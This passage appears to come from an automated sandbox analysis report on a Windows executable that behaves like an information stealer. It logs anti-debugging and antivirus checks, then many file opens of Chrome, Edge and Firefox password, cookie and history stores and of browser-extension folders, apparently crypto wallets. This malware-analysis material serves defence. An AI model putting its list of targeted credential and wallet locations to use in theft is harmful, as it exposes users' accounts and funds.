            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_004612AF mov eax, dword ptr fs:[00000030h]0_2_004612AF
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00461C9D mov eax, dword ptr fs:[00000030h]0_2_00461C9D
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00874072 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00874072
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00874742 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00874742
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087765B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0087765B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0087DA0A SetUnhandledExceptionFilter,0_2_0087DA0A
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00873FE7 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00873FE7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_00886128
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_0088615C
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0088629B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_008823CA
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: GetLocaleInfoA,0_2_0087A4BA
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00882622
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: GetLocaleInfoA,0_2_008847E2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_008829C1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00882AD8
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00882BE4
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_00882B70
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00882DB6
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00882EDE
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00882E77
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00882F1A
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_008771D5
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0087D794
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00881D5C
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00877054 __get_daylight,__invoke_watson,GetSystemTimeAsFileTime,__aulldiv,GetTimeZoneInformation,__aulldiv,__aullrem,__aulldiv,0_2_00877054
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_00877054 __get_daylight,__invoke_watson,GetSystemTimeAsFileTime,__aulldiv,GetTimeZoneInformation,__aulldiv,__aullrem,__aulldiv,0_2_00877054
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469741701.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.0000000000704000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000000.00000003.1476540257.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe PID: 6168, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
